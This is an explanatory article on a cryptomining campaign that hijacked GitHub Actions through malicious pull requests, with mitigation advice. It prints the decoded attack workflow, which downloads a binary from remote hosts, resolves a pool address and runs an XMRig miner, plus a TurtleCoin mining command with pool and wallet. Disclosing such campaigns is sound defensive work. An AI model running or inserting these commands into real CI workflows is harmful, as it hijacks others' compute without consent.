How Hackers Hijack GitHub Actions to Run Free Crypto Mining

Suspicious Pull Requests Trigger Investigation

A French developer, Tib, noticed an unusual surge of pull requests (PRs) from a single GitHub user (y4ndexhater1) on a low‑star, seemingly abandoned repository. Within 14 hours he received seven PRs, all lacking descriptions, prompting him to examine the repository.

The repository contained a chaotic README with examples of Perl projects, GitHub Actions, CircleCI, and Travis CI configurations. Despite its obscurity, the repo was forked twice in three days, raising suspicion.

Running the Malicious Workflow

Tib discovered that the attacker had added a .github/workflows/ci.yml file. The workflow executed a base64‑encoded command that, when decoded, performed the following steps:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

The script installs basic tools, downloads a binary named prog, resolves a DNS name to obtain an IP address, makes the binary executable, and runs it with specific arguments.

Running objdump -s --section .comment prog revealed that the binary is built with GCC 10.2.1 on Alpine Linux. Executing ./prog --version showed:

$ ./prog --version
XMRig 6.8.1
 built on Feb 3 2021 with GCC 10.2.1
 features: 64-bit AES

libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

The binary is the popular Monero miner XMRig (version 6.8.1), though SHA‑256 verification suggested it might be a modified build.

Why This Attack Works

GitHub Actions automatically executes workflows defined in .github/workflows/*.yml when a PR is opened. If a repository trusts any PR‑triggered workflow, a malicious actor can run arbitrary code on GitHub’s free CI runners without the repository owner’s explicit approval.

The attack chain is:

Create a legitimate‑looking repository.

Add a malicious GitHub Action that downloads and runs a miner.

Submit a PR to a target repository that has a workflow configured to run on PR events.

When the PR is merged (or even just opened, depending on the workflow), the runner executes the hidden mining code.

Because the runner runs on GitHub’s infrastructure, the attacker gains free compute resources. Aqua Security estimates that in a three‑day window the campaign generated over 23,300 commits on GitHub, 58,000 builds on Docker Hub, and roughly 30,000 mining tasks, consuming significant CPU cycles.

Mitigation Strategies

To reduce risk, projects should:

Disable automatic workflow runs on PR events, or restrict them to trusted actions only (e.g., official GitHub actions or actions from verified authors).

Configure the .github/workflows directory to accept only locally defined actions or those from approved sources.

Report malicious accounts to GitHub for suspension and close the offending PRs.

Even with these measures, attackers can simply create new accounts, making complete eradication difficult.

The Campaign Continues on Other Platforms

Recent variants upload the miner to GitLab and disguise it as an npm package. A suspicious nani.bat file contains the following command, which mines TurtleCoin (a CPU‑friendly cryptocurrency):

npm.exe --algorithm argon2id_chukwa2 \
--pool turtlecoin.herominers.com:10380 \
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP \
--password xo

GitHub’s free runners provide roughly two Intel E5‑2673v4 cores and 7 GB RAM. A single runner can earn only a few cents per day, and most mining jobs are terminated within a few hours due to build‑time limits on platforms like Docker Hub.

Broader Security Implications

Beyond mining, the same vulnerability can allow attackers to read and write repository contents, and even exfiltrate encrypted secrets. Google Project Zero reported this issue to GitHub in July 2022, but remediation has been slow.

Recommendations: avoid using untrusted marketplace actions, never expose secret keys to public workflows, and monitor CI logs for unexpected network calls or binary downloads.

References:

https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/

https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc

https://blog.aquasec.com/container-security-alert-campaign-abusing-github-dockerhub-travis-ci-circle-ci

https://bugs.chromium.org/p/project-zero/issues/detail?id=2070